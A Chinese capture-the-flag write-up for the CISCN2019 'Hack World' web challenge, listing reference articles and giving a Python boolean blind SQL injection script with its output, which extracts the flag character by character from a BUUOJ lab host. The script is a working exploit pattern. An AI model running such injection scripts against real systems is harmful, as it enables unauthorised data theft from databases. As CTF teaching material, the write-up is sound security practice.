[CISCN2019 华北赛区 Day2 Web1]Hack World
参考wp有:
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World_末初mochu7的博客-CSDN博客
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解_风过江南乱的博客-CSDN博客
[CISCN2019 华北赛区 Day2 Web1]Hack World_沫忆末忆的博客-CSDN博客
https://www.cnblogs.com/upfine/p/16529318.html
- fuzz
Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;
【技术分享】MySQL 注入攻击与防御-安全客 - 安全资讯平台
- 布尔盲注
- 用bp fuzz实现sql注入
【CTF】利用 Burpsuite Fuzz 实现 SQL 注入 - 个人文章 - SegmentFault 思否
利用 Burpsuite Fuzz 实现 SQL 注入_hahazaizheli的博客-CSDN博客
- 安装requests库
Python中如何用命令行的方式安装requests库_命令行安装python的 requests_Matcha_ice_cream的博客-CSDN博客
- mysql注入语句
输入字符时的boo提示,那这里就得考虑布尔注入
在cmd界面安装requests库的前提下
用python执行脚本得到flag
import requests
import time
url='http://af8eb1d0-2d65-47d5-9144-aa92f3da4771.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
max = 127
min = 0
for c in range(0,127):
n = (int)((max+min)/2)
payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(n)+')'
r = requests.post(url,data = {'id':payload})
time.sleep(0.005)
if 'Hello' in str(r.content):
min=n
else:
max=n
if((max-min)<=1):
flag+=chr(max)
print("\r\n", end="")
print(flag,end='')
break
执行结果为:
f
fl
fla
flag
flag{
flag{6
flag{6b
flag{6bb
flag{6bbc
flag{6bbc5
flag{6bbc56
flag{6bbc563
flag{6bbc5635
flag{6bbc5635-
flag{6bbc5635-a
flag{6bbc5635-a1
flag{6bbc5635-a11
flag{6bbc5635-a114
flag{6bbc5635-a114-
flag{6bbc5635-a114-4
flag{6bbc5635-a114-41
flag{6bbc5635-a114-41e
flag{6bbc5635-a114-41ee
flag{6bbc5635-a114-41ee-
flag{6bbc5635-a114-41ee-b
flag{6bbc5635-a114-41ee-bc
flag{6bbc5635-a114-41ee-bc6
flag{6bbc5635-a114-41ee-bc63
flag{6bbc5635-a114-41ee-bc63-
flag{6bbc5635-a114-41ee-bc63-f
flag{6bbc5635-a114-41ee-bc63-fe
flag{6bbc5635-a114-41ee-bc63-fe5
flag{6bbc5635-a114-41ee-bc63-fe5a
flag{6bbc5635-a114-41ee-bc63-fe5a2
flag{6bbc5635-a114-41ee-bc63-fe5a26
flag{6bbc5635-a114-41ee-bc63-fe5a263
flag{6bbc5635-a114-41ee-bc63-fe5a2632
flag{6bbc5635-a114-41ee-bc63-fe5a2632c
flag{6bbc5635-a114-41ee-bc63-fe5a2632c5
flag{6bbc5635-a114-41ee-bc63-fe5a2632c5f
flag{6bbc5635-a114-41ee-bc63-fe5a2632c5ff
flag{6bbc5635-a114-41ee-bc63-fe5a2632c5ff}